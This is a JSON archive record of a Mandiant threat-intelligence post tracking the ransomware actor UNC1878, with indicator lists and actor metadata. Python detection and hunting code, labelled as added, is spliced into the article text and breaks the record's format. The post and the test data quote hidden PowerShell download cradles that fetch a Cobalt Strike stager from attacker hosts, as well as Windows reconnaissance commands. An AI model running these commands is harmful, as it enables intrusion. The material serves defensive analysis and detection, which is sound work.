{
	"id": "2348838a-435a-4abe-a70c-7c7554844ea0",
	"created_at": "2026-04-06T00:10:23.424089Z",
	"updated_at": "2026-04-10T03:33:27.400671Z",
	"deleted_at": null,
	"sha1_hash": "06a69fc41ca9910a185e596198003653835973a3",
	"title": "It's Your Money and They Want It Now — The Cycle of Adversary Pursuit | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 107526,
	"plain_text": "It's Your Money and They Want It Now — The Cycle of Adversary\r\nPursuit | Mandiant\r\nBy Mandiant\r\nPublished: 2020-03-31 · Archived: 2026-04-05 17:52:43 UTC\r\nWritten by: Van Ta, Aaron Stephens\r\nWhen we discover new intrusions, we ask ourselves questions that will help us understand the totality of the activity set.\r\nHow common is this activity? Is there anything unique or special about this malware or campaign? What is new and what is\r\nold in terms of TTPs or infrastructure? Is this being seen anywhere else? What information do I have that substantiates the\r\nnature of this threat actor?\r\nTo track a fast-moving adversary over time, we exploit organic intrusion data, pivot to other data sets, and make that\r\nknowledge actionable for analysts and incident responders, enabling new discoveries and assessments on the actor. The\r\nFireEye Advanced Practices team exists to know more about the adversary than anyone else, and by asking and answering\r\nquestions such as these, we enable analyst action in security efforts. In this blog post, we highlight how our cycle of\r\nidentification, expansion, and discovery was used to track a financially motivated actor across FireEye’s global data sets.\r\nIdentification\r\nOn January 29, 2020, FireEye Managed Defense investigated multiple TRICKBOT deployments against a U.S. 
based client.\r\nShortly after initial deployment, TRICKBOT’s networkDll module ran the following network reconnaissance commands\r\n(Figure 1).\r\nipconfig /all\r\nnet config workstation\r\nnet view /all\r\nnet view /all /domain\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nFigure 1: Initial Reconnaissance\r\nApproximately twenty minutes after reconnaissance, the adversary ran a PowerShell command to download and execute a\r\nCobalt Strike HTTPS BEACON stager in memory (Figure 2).\r\ncmd.exe /c powershell.exe -nop –w hidden –c “IEX ((new-object\r\nnet.webclient).downloadstring(‘hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt’))”\r\nFigure 2: PowerShell download cradle used to request a Cobalt Strike stager\r\nSix minutes later, Managed Defense identified evidence of enumeration and attempted lateral movement through the\r\nBEACON implant. Managed Defense alerted the client of the activity and the affected hosts were contained, stopping the\r\nintrusion in its tracks. A delta of approximately forty-six minutes between a TRICKBOT infection and attempted lateral\r\nmovement was highly unusual and, along with the clever masquerade domain, warranted further examination by our team.\r\nAlthough light, indicators from this intrusion were distinct enough to create an uncategorized threat group, referred to as\r\nUNC1878. At the time of initial clustering, UNC1878’s intent was not fully understood due to the rapid containment of the\r\nintrusion by Managed Defense. By creating this label, we are able to link activity from the Managed Defense investigation\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html\r\nPage 1 of 7\n\ninto a single entity, allowing us to expand our understanding of this group and track their activity over time. This is\r\nespecially important when dealing with campaigns involving mass malware, as it helps delineate the interactive actor from\r\nthe malware campaign they are leveraging. 
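The sequence above, a burst of the Figure 1 reconnaissance commands followed roughly twenty minutes later by the Figure 2 download cradle, is a host-level pattern worth alerting on in its own right. The Python below is an added example, not code from the original post or from Mandiant: the process-creation events, host names, timestamps and thresholds are constructed for illustration. It normalises command lines (including the Unicode dashes that PowerShell accepts in place of the hyphen, as they appear in Figure 2), treats three or more distinct Figure 1 commands on one host within five minutes as a reconnaissance burst, and raises a high-severity alert when a hidden-window PowerShell download cradle follows on that host within an hour; a cradle with no preceding burst is still reported at medium severity.

```python
from datetime import datetime, timedelta

# Reconnaissance commands from Figure 1, in normalised form (lower case, single spaces).
RECON_COMMANDS = {
    'ipconfig /all',
    'net config workstation',
    'net view /all',
    'net view /all /domain',
    'nltest /domain_trusts',
    'nltest /domain_trusts /all_trusts',
}

# PowerShell treats en dash, em dash and horizontal bar as the parameter prefix, so a rule
# that only looks for '-w hidden' would miss the spelling shown in Figure 2.
UNICODE_DASHES = (chr(0x2013), chr(0x2014), chr(0x2015))
# Quote and grouping characters are replaced by spaces so that IEX becomes its own token.
PUNCTUATION = ('(', ')', ';', '|', chr(34), chr(39))


def normalise(cmdline):
    cmd = cmdline.lower()
    for dash in UNICODE_DASHES:
        cmd = cmd.replace(dash, '-')
    for prefix in ('cmd.exe /c ', 'cmd /c '):
        if cmd.startswith(prefix):
            cmd = cmd[len(prefix):]
    for ch in PUNCTUATION:
        cmd = cmd.replace(ch, ' ')
    tokens = cmd.split()
    if tokens and tokens[0].endswith('.exe'):   # net.exe, net1.exe, nltest.exe, powershell.exe
        tokens[0] = tokens[0][:-4]
    if tokens and tokens[0] == 'net1':          # net.exe hands most subcommands to net1.exe
        tokens[0] = 'net'
    return ' '.join(tokens)


def is_recon(cmdline):
    return normalise(cmdline) in RECON_COMMANDS


def is_download_cradle(cmdline):
    cmd = normalise(cmdline)
    tokens = cmd.split()
    if not any(t.startswith('powershell') or t == 'pwsh' for t in tokens):
        return False
    evaluates = any(t in ('iex', 'invoke-expression') for t in tokens)
    fetches = any(s in cmd for s in ('downloadstring', 'downloaddata', 'downloadfile', 'invoke-webrequest')) or 'iwr' in tokens
    quiet = any(s in cmd for s in ('-w hidden', '-windowstyle hidden', '-win hidden', '-nop', '-noprofile', '-noni'))
    return evaluates and fetches and quiet


def correlate(events, min_recon=3, burst_window=timedelta(minutes=5), cradle_window=timedelta(minutes=60)):
    # events: dicts with 'host', 'ts' (datetime) and 'cmdline'. Returns one alert per download cradle.
    alerts = []
    by_host = {}
    for e in sorted(events, key=lambda e: e['ts']):
        by_host.setdefault(e['host'], []).append(e)
    for host, evs in by_host.items():
        recon = [e for e in evs if is_recon(e['cmdline'])]
        burst_start = None
        for e in recon:
            in_window = [r for r in recon if e['ts'] <= r['ts'] <= e['ts'] + burst_window]
            if len({normalise(r['cmdline']) for r in in_window}) >= min_recon:
                burst_start = e['ts']
                break
        for e in evs:
            if not is_download_cradle(e['cmdline']):
                continue
            followed_burst = burst_start is not None and burst_start <= e['ts'] <= burst_start + cradle_window
            alerts.append({
                'host': host,
                'severity': 'high' if followed_burst else 'medium',
                'cradle_at': e['ts'],
                'minutes_after_recon': int((e['ts'] - burst_start).total_seconds() // 60) if followed_burst else None,
                'cmdline': e['cmdline'],
            })
    return alerts


def constructed_events():
    # Constructed process-creation events (not real telemetry). WS01 mirrors the Figure 1 and 2
    # sequence; WS02 is routine administration; WS03 runs a cradle with no preceding reconnaissance.
    base = datetime(2020, 1, 29, 14, 0, 0)
    sq = chr(39)  # single quote around the URL argument inside the cradle
    figure2 = ('cmd.exe /c powershell.exe -nop ' + chr(0x2013) + 'w hidden ' + chr(0x2013) + 'c \"IEX ((new-object '
               'net.webclient).downloadstring(' + sq + 'hxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt' + sq + '))\"')

    def ev(host, minutes, cmdline):
        return {'host': host, 'ts': base + timedelta(minutes=minutes), 'cmdline': cmdline}

    return [
        ev('WS01', 0, 'ipconfig /all'),
        ev('WS01', 0, 'net config workstation'),
        ev('WS01', 1, 'net view /all'),
        ev('WS01', 1, 'net view /all /domain'),
        ev('WS01', 2, 'nltest /domain_trusts'),
        ev('WS01', 2, 'nltest /domain_trusts /all_trusts'),
        ev('WS01', 20, figure2),
        ev('WS02', 3, 'ipconfig /all'),
        ev('WS02', 8, 'powershell.exe -ExecutionPolicy Bypass -File C:/scripts/inventory.ps1'),
        ev('WS03', 30, 'powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(' + sq + 'http://198.51.100.7/a' + sq + ')'),
    ]


if __name__ == '__main__':
    for alert in correlate(constructed_events()):
        print(alert['severity'].upper(), alert['host'], alert['cradle_at'].isoformat(), alert['minutes_after_recon'])
```

Single commands such as ipconfig /all are routine, so the rule keys on the combination and the ordering rather than on any one command, and the thresholds are the knobs to tune against a given environment. The dash handling matters: a plain string match on -w hidden would not fire on the exact text shown in Figure 2.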
For more information on our clustering methodology, check out our post about\r\nhow we analyze, separate, or merge these clusters at scale.\r\nExpansion\r\nPivoting on the command and control (C2) domain allowed us to begin building a profile of UNC1878 network\r\ninfrastructure. WHOIS records for cylenceprotect[.]com (Figure 3) revealed that the domain was registered on January 27,\r\n2020, with the registrar \"Hosting Concepts B.V. d/b/a Openprovider\", less than two days before we saw this domain used in\r\nactivity impacting the Managed Defense customer.\r\nDomain Name: cylenceprotect.com\r\nRegistry Domain ID: 2485487352_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.registrar.eu\r\nRegistrar URL: http://www.registrar.eu\r\nUpdated Date: 2020-01-28T00:35:43Z\r\nCreation Date: 2020-01-27T23:32:18Z\r\nRegistrar Registration Expiration Date: 2021-01-27T23:32:18Z\r\nRegistrar: Hosting Concepts B.V. d/b/a Openprovider\r\nFigure 3: WHOIS record for the domain cylenceprotect[.]com\r\nTurning our attention to the server, the domain resolved to 45.76.20.140, an IP address owned by the VPS provider Choopa.\r\nIn addition, the domain used self-hosted name servers ns1.cylenceprotect[.]com and ns2.cylenceprotect[.]com, which also\r\nresolved to the Choopa IP address. 
Network scan data for the server uncovered a certificate on ports 80 and 443, a snippet of\r\nwhich can be seen in Figure 4.\r\nCertificate:\r\n Data:\r\n Version: 3 (0x2)\r\n Serial Number:\r\n 03:a8:60:02:c7:dd:7f:88:5f:2d:86:0d:88:41:e5:3e:25:f0\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3\r\n Validity\r\n Not Before: Jan 28 02:02:14 2020 GMT\r\n Not After : Apr 27 02:02:14 2020 GMT\r\n Subject: CN=cylenceprotect[.]com\r\nFigure 4: TLS Certificate for the domain cylenceprotect[.]com\r\nThe certificate was issued by Let’s Encrypt, with the earliest validity date within 24 hours of the activity detected by\r\nManaged Defense, substantiating the speed with which this threat actor operates. Along with the certificate in Figure 4, we also\r\nidentified the default, self-signed Cobalt Strike team server certificate (Figure 5) on port 54546 (50050 by default).\r\nCertificate:\r\n Data:\r\n Version: 3 (0x2)\r\n Serial Number: 1843990795 (0x6de9110b)\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike\r\n Validity\r\n Not Before: Jan 28 03:06:30 2020 GMT\r\n Not After : Apr 27 03:06:30 2020 GMT\r\n Subject: C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike\r\nFigure 5: Default Cobalt Strike TLS Certificate used by UNC1878\r\nSimilar to the certificate on ports 80 and 443, the earliest validity date was again within 24 hours of the intrusion identified\r\nby Managed Defense.
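The registrar, name server, hosting and certificate observations above are each weak on their own, but together they make a server profile that can be searched for in WHOIS, passive DNS and internet scan data. The Python below is an added example, not code from the original post or from Mandiant; its record layout, scoring scheme and the two comparison servers are constructed, and only the cylenceprotect[.]com values (Openprovider registrar, ns1/ns2 under the domain itself, Choopa hosting, Let's Encrypt on port 80, the stock Cobalt Strike certificate subject and serial from Figure 5 on port 54546, registration less than two days before use) are taken from the article. It scores each candidate on those traits and keeps only servers that match several at once.

```python
from datetime import datetime

# Infrastructure traits of the cylenceprotect[.]com server (Figures 3 to 5), encoded as hunting
# signals. Field names, the scoring scheme and the sample records are constructed for this example.
OPENPROVIDER = 'hosting concepts b.v. d/b/a openprovider'
CHOOPA = 'choopa'
LETS_ENCRYPT = 'let' + chr(39) + 's encrypt'
CS_DEFAULT_SERIAL = 1843990795          # serial of the team server certificate shown in Figure 5
CS_DEFAULT_CN = 'major cobalt strike'   # subject CN of the stock self-signed certificate shipped with Cobalt Strike
CS_DEFAULT_PORT = 50050                 # default team server port; the article saw it moved to 54546
GENERIC_TERMS = ('update', 'system', 'service', 'defen', 'protect', 'security')


def self_hosted_ns(domain, name_servers):
    # ns1/ns2 under the domain itself rather than under a registrar or DNS provider.
    domain = domain.lower()
    return bool(name_servers) and all(ns.lower().endswith('.' + domain) for ns in name_servers)


def score_server(rec):
    hits = []
    if OPENPROVIDER in rec.get('registrar', '').lower():
        hits.append('registrar:openprovider')
    if self_hosted_ns(rec['domain'], rec.get('name_servers', [])):
        hits.append('dns:self-hosted-nameservers')
    if CHOOPA in rec.get('hosting_org', '').lower():
        hits.append('hosting:choopa')
    if any(term in rec['domain'].lower() for term in GENERIC_TERMS):
        hits.append('naming:generic-it-security-term')
    for cert in rec.get('certs', []):
        issuer = cert.get('issuer', '').lower()
        subject = cert.get('subject', '').lower()
        if cert['port'] == 80 and LETS_ENCRYPT in issuer:
            # TLS served on the cleartext HTTP port, matching the https-on-port-80 stager URL in Figure 2.
            hits.append('tls:lets-encrypt-on-port-80')
        if cert.get('serial') == CS_DEFAULT_SERIAL or CS_DEFAULT_CN in subject:
            tag = 'cobaltstrike:default-cert'
            if cert['port'] != CS_DEFAULT_PORT:
                tag += '-nonstandard-port'
            hits.append(tag)
    created, first_seen = rec.get('created'), rec.get('first_seen')
    if created and first_seen and (first_seen - created).days <= 7:
        hits.append('whois:registered-within-7d-of-first-use')   # the article saw under two days
    return {'domain': rec['domain'], 'score': len(hits), 'hits': hits}


def hunt(records, threshold=4):
    # Several weak signals together, not any one of them, are what make a server worth a look.
    return [r for r in (score_server(x) for x in records) if r['score'] >= threshold]


def constructed_records():
    le_issuer = 'C=US, O=Let' + chr(39) + 's Encrypt, CN=Let' + chr(39) + 's Encrypt Authority X3'
    cs_dn = 'C=Earth, ST=Cyberspace, L=Somewhere, O=cobaltstrike, OU=AdvancedPenTesting, CN=Major Cobalt Strike'
    return [
        {   # Profile of the C2 server from the Managed Defense intrusion; first_seen time of day is constructed.
            'domain': 'cylenceprotect.com',
            'registrar': 'Hosting Concepts B.V. d/b/a Openprovider',
            'created': datetime(2020, 1, 27, 23, 32, 18),
            'first_seen': datetime(2020, 1, 29, 12, 0, 0),
            'name_servers': ['ns1.cylenceprotect.com', 'ns2.cylenceprotect.com'],
            'hosting_org': 'Choopa, LLC',
            'certs': [
                {'port': 80, 'issuer': le_issuer, 'subject': 'CN=cylenceprotect.com'},
                {'port': 443, 'issuer': le_issuer, 'subject': 'CN=cylenceprotect.com'},
                {'port': 54546, 'issuer': cs_dn, 'subject': cs_dn, 'serial': 1843990795},
            ],
        },
        {   # Constructed benign record: long-registered corporate domain on provider DNS, commercial CA on 443 only.
            'domain': 'example-corp.com', 'registrar': 'MarkMonitor Inc.',
            'created': datetime(2012, 5, 1), 'first_seen': datetime(2020, 2, 1),
            'name_servers': ['ns1.examplednsprovider.net', 'ns2.examplednsprovider.net'], 'hosting_org': 'Example Cloud Inc',
            'certs': [{'port': 443, 'issuer': 'O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1', 'subject': 'CN=example-corp.com'}],
        },
        {   # Constructed partial match: same registrar and VPS provider, nothing else.
            'domain': 'blueharbor-photos.com', 'registrar': 'Hosting Concepts B.V. d/b/a Openprovider',
            'created': datetime(2019, 6, 3), 'first_seen': datetime(2020, 2, 1),
            'name_servers': ['ns1.registrar-dns.example', 'ns2.registrar-dns.example'], 'hosting_org': 'Choopa, LLC',
            'certs': [{'port': 443, 'issuer': le_issuer, 'subject': 'CN=blueharbor-photos.com'}],
        },
    ]


if __name__ == '__main__':
    for result in hunt(constructed_records()):
        print(result['domain'], result['score'], ', '.join(result['hits']))
```

The certificate check matches on subject CN as well as serial: the serial in Figure 5 belongs to one keystore, while the Major Cobalt Strike subject is what every unmodified team server presents. Openprovider and Choopa are legitimate providers with many benign customers, which is why they count for one point each and the threshold sits at four.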
Continuing analysis on the server, we acquired the BEACON stager and subsequent BEACON\r\npayload, which was configured to use the Amazon malleable C2 profile.\r\nWhile these indicators may not hold significant weight on their own, together they create a recognizable pattern to fuel\r\nproactive discovery of related infrastructure. We began hunting for servers that exhibited the same characteristics as those\r\nused by UNC1878. Using third-party scan data, we quickly identified additional servers that matched a preponderance of\r\nUNC1878 tradecraft:\r\nDomains typically composed of generic IT or security related terms such as \"update\", \"system\", and \"service\".\r\nDomains registered with \"Hosting Concepts B.V. d/b/a Openprovider\" as early as December 19, 2019.\r\nSelf-hosted name servers.\r\nLet’s Encrypt certificates on port 80.\r\nVirtual private servers hosted predominantly by Choopa.\r\nBEACON payloads configured with the Amazon malleable C2 profile.\r\nCobalt Strike team servers on non-standard ports.\r\nAlong with certificates matching UNC1878 tradecraft, we also found self-signed Armitage certificates, indicating this group\r\nmay use multiple offensive security tools.\r\nBy pivoting on the limited indicators extracted from a single Managed Defense intrusion, we expanded a small cluster of activity\r\ninto a more diverse set of indicators central to UNC1878. While the objective and goal of this threat actor had not yet\r\nmanifested, the correlation of infrastructure allowed our team to recognize this threat actor’s operations against other\r\ncustomers.\r\nDiscovery\r\nWith an established modus operandi for UNC1878, our team quickly identified several related intrusions in support of\r\nFireEye Mandiant investigations over the next week. Within two days of our initial clustering and expansion of UNC1878\r\nfrom the original Managed Defense investigation, Mandiant Incident Responders were investigating activity at a U.S.-based\r\nmedical equipment company with several indicators we had previously identified and attributed to UNC1878. Attributed\r\ndomains, payloads and methodologies provided consultants with a baseline to build detections on, as well as a level of\r\nconfidence in the actor’s capabilities and the speed at which they operate.\r\nThree days later, UNC1878 was identified during another incident response engagement at a restaurant chain. In this\r\nengagement, Mandiant consultants found evidence of attempted deployment of RYUK ransomware on hundreds of systems,\r\nfinally revealing UNC1878’s desired end goal. In the following weeks, we continued to encounter UNC1878 in various\r\nphases of their intrusions at several Mandiant Incident Response and Managed Defense customers.\r\nWhile services data offers us a depth of understanding into these intrusions, we turn to our product telemetry to understand\r\nthe breadth of activity, giving us a broader view of the global prevalence of this threat actor. This led to\r\nthe discovery of a UNC1878 intrusion at a technology company, resulting in Mandiant immediately notifying the affected\r\ncustomer. By correlating multiple UNC1878 intrusions across our services and product customers, it became evident that the\r\ntargeting was indiscriminate, a common characteristic of opportunistic ransomware campaigns.\r\nAlthough initially there were unanswered questions surrounding UNC1878’s intent, we were able to provide valuable\r\ninsights into their capabilities to our consultants and analysts.
In turn, the intrusion data gathered during these engagements\r\ncontinued the cycle of building our understanding of UNC1878’s tradecraft, enabling our responders to handle these\r\nincidents swiftly in the face of imminent ransomware deployment.\r\nConclusion\r\nThreat actors continue to use mass malware campaigns to establish footholds into target environments, followed by\r\ninteractive operations focused on deploying ransomware such as RYUK, DOPPELPAYMER and MAZE. Looking at the\r\noverall trend of intrusions FireEye responds to, the growing shift from traditional payment card (PCI) data theft to ransomware has allowed\r\nthreat actors such as UNC1878 to widen their scope and increase their tempo, costing organizations millions of dollars due\r\nto business disruption and ransom payments. However, apart from their speed, UNC1878 does not stand out among the\r\nincreasing number of groups following this trend, and should not be the key takeaway of this blog post.\r\nThe cycle of analysis and discovery used for UNC1878 lies at the core of our team’s mission to rapidly detect and pursue\r\nimpactful adversaries at scale. Starting from a single intrusion at a Managed Defense client, we were able to discover\r\nUNC1878 activity at multiple customers. Our analysis of the early stages of their activity allowed us to pivot and\r\npursue this actor across otherwise unrelated investigations. As we refine and expand our understanding of UNC1878’s\r\ntradecraft, our team enables Mandiant and Managed Defense to efficiently identify, respond to, and eradicate a financially\r\nmotivated threat actor whose end goal could cripple targeted organizations.
The principles applied in pursuit of this actor are\r\ncrucial to tracking any adversary and are ultimately how the Advanced Practices team surfaces meaningful activity across\r\nthe FireEye ecosystem.\r\nAcknowledgements\r\nThank you to Andrew Thompson, Dan Perez, Steve Miller, John Gorman and Brendan McKeague for technical review of\r\nthis content. In addition, thank you to the frontline responders harvesting valuable intrusion data that enables our research.\r\nIndicators of Compromise\r\nDomains\r\naaatus[.]com\r\navrenew[.]com\r\nbesttus[.]com\r\nbigtus[.]com\r\nbrainschampions[.]com\r\ncheckwinupdate[.]com\r\nciscocheckapi[.]com\r\ncleardefencewin[.]com\r\ncmdupdatewin[.]com\r\ncomssite[.]com\r\nconhostservice[.]com\r\ncylenceprotect[.]com\r\ndefenswin[.]com\r\neasytus[.]com\r\nfindtus[.]com\r\nfirsttus[.]com\r\nfreeallsafe[.]com\r\nfreeoldsafe[.]com\r\ngreattus[.]com\r\nhavesetup[.]net\r\niexploreservice[.]com\r\njomamba[.]best\r\nlivecheckpointsrs[.]com\r\nlivetus[.]com\r\nlsassupdate[.]com\r\nlsasswininfo[.]com\r\nmicrosoftupdateswin[.]com\r\nmyservicebooster[.]com\r\nmyservicebooster[.]net\r\nmyserviceconnect[.]net\r\nmyserviceupdater[.]com\r\nmyyserviceupdater[.]com\r\nrenovatesystem[.]com\r\nservice-updater[.]com\r\nservicesbooster[.]com\r\nservicesbooster[.]org\r\nservicesecurity[.]org\r\nserviceshelpers[.]com\r\nserviceupdates[.]net\r\nserviceuphelper[.]com\r\nsophosdefence[.]com\r\ntarget-support[.]online\r\ntaskshedulewin[.]com\r\ntimesshifts[.]com\r\ntopsecurityservice[.]net\r\ntopservicehelper[.]com\r\ntopservicesbooster[.]com\r\ntopservicesecurity[.]com\r\ntopservicesecurity[.]net\r\ntopservicesecurity[.]org\r\ntopservicesupdate[.]com\r\ntopservicesupdates[.]com\r\ntopserviceupdater[.]com\r\nupdate-wind[.]com\r\nupdatemanagir[.]us\r\nupdatewinlsass[.]com\r\nupdatewinsoftr[.]com\r\nweb-analysis[.]live\r\nwindefenceinfo[.]com\r\nwindefens[.]com\r\nwinsysteminfo[.]com\r\nwinsystemupdate[.]com\r\nworldtus[.]com\r\nyoursuperservice[.]com\r\nIP Addresses\r\n31.7.59.141\r\n45.32.30.162\r\n45.32.130.5\r\n45.32.161.213\r\n45.32.170.9\r\n45.63.8.219\r\n45.63.95.187\r\n45.76.20.140\r\n45.76.167.35\r\n45.76.231.195\r\n45.77.58.172\r\n45.77.89.31\r\n45.77.98.157\r\n45.77.119.212\r\n45.77.153.72\r\n45.77.206.105\r\n63.209.33.131\r\n66.42.97.225\r\n66.42.99.79\r\n79.124.60.117\r\n80.240.18.106\r\n81.17.25.210\r\n95.179.147.215\r\n95.179.210.8\r\n95.179.215.228\r\n96.30.192.141\r\n96.30.193.57\r\n104.156.227.250\r\n104.156.245.0\r\n104.156.250.132\r\n104.156.255.79\r\n104.238.140.239\r\n104.238.190.126\r\n108.61.72.29\r\n108.61.90.90\r\n108.61.176.237\r\n108.61.209.123\r\n108.61.242.184\r\n140.82.5.67\r\n140.82.10.222\r\n140.82.27.146\r\n140.82.60.155\r\n144.202.12.197\r\n144.202.83.4\r\n149.28.15.247\r\n149.28.35.35\r\n149.28.50.31\r\n149.28.55.197\r\n149.28.81.19\r\n149.28.113.9\r\n149.28.122.130\r\n149.28.246.25\r\n149.248.5.240\r\n149.248.56.113\r\n149.248.58.11\r\n151.106.56.223\r\n155.138.135.182\r\n155.138.214.247\r\n155.138.216.133\r\n155.138.224.221\r\n207.148.8.61\r\n207.148.15.31\r\n207.148.21.17\r\n207.246.67.70\r\n209.222.108.106\r\n209.250.255.172\r\n216.155.157.249\r\n217.69.15.175\r\nBEACON Staging URLs\r\nhxxp://104.156.255[.]79:80/avbcbgfyhunjmkmk\r\nhxxp://149.28.50[.]31:80/adsrxdfcffdxfdsgfxzxds\r\nhxxp://149.28.81[.]19:80/ajdlkashduiqwhuyeu12312g3yugshdahqjwgye1g2uy31u1\r\nhxxp://45.32.161[.]213:80/ephfusaybuzabegaexbkakskjfgksajgbgfckskfnrdgnkhdsnkghdrngkhrsngrhgcngyggfxbgufgenwfxwgfeu\r\nhxxp://45.63.8[.]219:80/ajhgfrtyujhytr567uhgfrt6y789ijhg\r\nhxxp://66.42.97[.]225:80/aqedfy345yu9876red45f6g78j90\r\nhxxp://findtus[.]com/akkhujhbjcjcjhufuuljlvu\r\nhxxp://thedemocraticpost[.]com/kflmgkkjdfkmkfl\r\nhxxps://brainschampions[.]com:443/atrsgrtehgsetrh5ge\r\nhxxps://ciscocheckapi[.]com:80/adsgsergesrtvfdvsa\r\nhxxps://cylenceprotect[.]com:80/abresgbserthgsbabrt\r\nhxxps://havesetup[.]net/afgthyjuhtgrfety\r\nhxxps://servicesbooster[.]org:443/sfer4f54\r\nhxxps://servicesecurity[.]org:443/fuhvbjk\r\nhxxps://timesshifts[.]com:443/akjhtyrdtfyguhiugyft\r\nhxxps://timesshifts[.]com:443/ry56rt6yh5rth\r\nhxxps://update-wind[.]com/aergerhgrhgeradgerg\r\nhxxps://updatemanagir[.]us:80/afvSfaewfsdZFAesf\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html"
	],
	"report_names": [
		"the-cycle-of-adversary-pursuit.html"
	],
	"threat_actors": [
		{
			"id": "12211366-1f14-4eed-9d91-46b6a2ede618",
			"created_at": "2025-08-07T02:03:25.014713Z",
			"updated_at": "2026-04-10T02:00:03.624097Z",
			"deleted_at": null,
			"main_name": "GOLD ULRICK",
			"aliases": [
				"Grim Spider ",
				"UNC1878 "
			],
			"source_name": "Secureworks:GOLD ULRICK",
			"tools": [
				"Bloodhound",
				"Buer Loader",
				"Cobalt Strike",
				"Conti",
				"Diavol",
				"PowerShell Empire",
				"Ryuk",
				"SystemBC",
				"Team9 (aka BazarLoader)",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ab9d6b30-7c60-4d0b-8f49-e2e913c28508",
			"created_at": "2022-10-25T16:07:24.584775Z",
			"updated_at": "2026-04-10T02:00:05.042135Z",
			"deleted_at": null,
			"main_name": "UNC1878",
			"aliases": [],
			"source_name": "ETDA:UNC1878",
			"tools": [
				"Agentemis",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"KEGTAP",
				"Ryuk",
				"Team9Backdoor",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0a4f4edc-ea8c-4a30-8ded-35394e29de01",
			"created_at": "2023-01-06T13:46:39.178183Z",
			"updated_at": "2026-04-10T02:00:03.23716Z",
			"deleted_at": null,
			"main_name": "UNC1878",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC1878",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434223,
	"ts_updated_at": 1775792007,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/06a69fc41ca9910a185e596198003653835973a3.pdf",
		"text": "https://archive.orkl.eu/06a69fc41ca9910a185e596198003653835973a3.txt",
		"img": "https://archive.orkl.eu/06a69fc41ca9910a185e596198003653835973a3.jpg"
	}
}